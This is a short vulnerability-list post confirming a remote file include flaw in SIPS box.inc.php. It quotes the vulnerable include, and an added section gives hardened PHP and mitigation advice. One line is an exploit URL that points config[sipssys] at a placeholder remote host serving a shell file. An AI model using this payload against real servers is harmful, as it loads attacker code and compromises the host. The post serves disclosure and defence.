[VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Thu Feb 1 10:15:43 EST 2007
The program is vulnerable: $config[sipssys] is the first line of code
in the file box.inc.php.
But the documentation states:
Unpack the sips archive file. Sips requires a special directory where it
stores all kinds of data such as users, stories and php code. This directory
can be anywhere, but if you can, you should place it outside of the public
html area of the server, for security reasons.
So it's kind of a coin toss-up.
/str0ke
http://sourceforge.net/projects/sips/
<?
include $config["sipssys"] ."/code/rssparser.inc.php";
?>
//sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x
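
Added example, not part of the original post and not SIPS code: a hardened form of the include shown above, for the case where the data directory sits inside the public HTML area and box.inc.php can be requested directly. The request can only populate $config when PHP runs with register_globals enabled; SIPS_ENTRY and sips_resolve() are hypothetical names introduced for this sketch.

```php
<?php
// Hardened sketch of the include in box.inc.php (added example).
// SIPS_ENTRY and sips_resolve() are hypothetical names, not part of SIPS.

// Direct requests to this file stop here: only an entry script that
// defined SIPS_ENTRY before including it gets any further.
if (!defined('SIPS_ENTRY')) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

// $config must come from the application's own configuration. If the
// request carries a "config" parameter, refuse it rather than risk it
// having been copied into the global scope.
if (isset($_GET['config']) || isset($_POST['config']) || isset($_COOKIE['config'])) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}

/**
 * Resolve $relative below the data directory $base. Rejects stream
 * wrappers (http://, ftp://, ...) and any path that resolves outside
 * the directory, so the include can only ever read a local file.
 */
function sips_resolve($base, $relative)
{
    if (!is_string($base) || strpos($base, '://') !== false) {
        throw new RuntimeException('data directory must be a local path');
    }
    $root = realpath($base);
    $full = ($root === false) ? false : realpath($root . '/' . $relative);
    if ($full === false || strpos($full, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include path is outside the data directory');
    }
    return $full;
}

include sips_resolve($config['sipssys'], 'code/rssparser.inc.php');
```

Independently of the code, keeping the data directory outside the web root, as the SIPS documentation recommends, and running with register_globals and allow_url_include disabled each remove a precondition for the remote include.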